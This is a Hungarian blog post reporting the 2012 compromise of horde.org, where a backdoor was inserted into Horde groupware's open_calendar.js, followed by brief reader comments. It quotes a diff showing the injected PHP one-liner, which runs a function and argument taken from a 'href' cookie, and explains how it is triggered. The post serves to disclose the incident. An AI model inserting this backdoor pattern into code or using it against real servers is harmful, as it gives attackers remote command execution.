A Horde csoportmunka szoftver fejlesztői híreiben tegnap közölték, hogy támadás érte a horde.org tárolóit, és távoli kódfuttatásra alkalmas hátsó kaput helyeztek el a szoftverben. Az incidens a 3.3-as és 1.2-es verziókat érintette egészen tavaly november 15-től kezdődően. A legfrissebb, 4-es verzióhoz a támadók nem nyúltak.
Eric Romang rövid összefoglalót közölt a hátsó kapuról. Eszerint a rosszindulatú kódrészletet a templates/javascript/open_calendar.js szkriptbe rejtették:
diff -u open_calendar.js.orig open_calendar.js.backdoor
--- open_calendar.js.orig 2012-02-14 22:50:33.143182985 +0100
+++ open_calendar.js.backdoor 2012-02-14 22:49:59.143183225 +0100
@@ -274,7 +274,7 @@
cell = document.createElement('TD');
cell.className = 'rightAlign';
link = document.createElement('A');
- link.href = '#';
+ link.href = '#<?php (isset($_COOKIE["href"]) && preg_match("/(.*):(.*)/", $_COOKIE["href"], $m))?$m[1]($m[2]):"";?>';
link.innerHTML = '»';
link.onclick = function()
{
Amennyiben tehát egy látogatónál be van állítva egy href nevű süti, melyben egy "függvénynév:paraméter" formátumú sztring található, a fügvény az adott paraméterekkel lefut (pl. "system:id"). A megpatkolt szkript a segítség nyitóoldalán (/services/help/index.php), a jelszóemlékeztető és -változtató felületeken (/services/(change|reset)password.php), valamint az install szkriptben (/admin/setup/index.php) töltődik be
sebcsaba 2012.02.15. 17:29:19
buherator · http://buhera.blog.hu 2012.02.15. 17:56:23
Hunger 2012.02.15. 18:08:17
A js közvetlenül nem is elérhető, mert az egész templates könyvtárra "deny from all" van rakva. Secure by Default!
Elvégre egy közvetlenül elérhető js file sok galádságra képes... :)
sebcsaba 2012.02.16. 11:21:18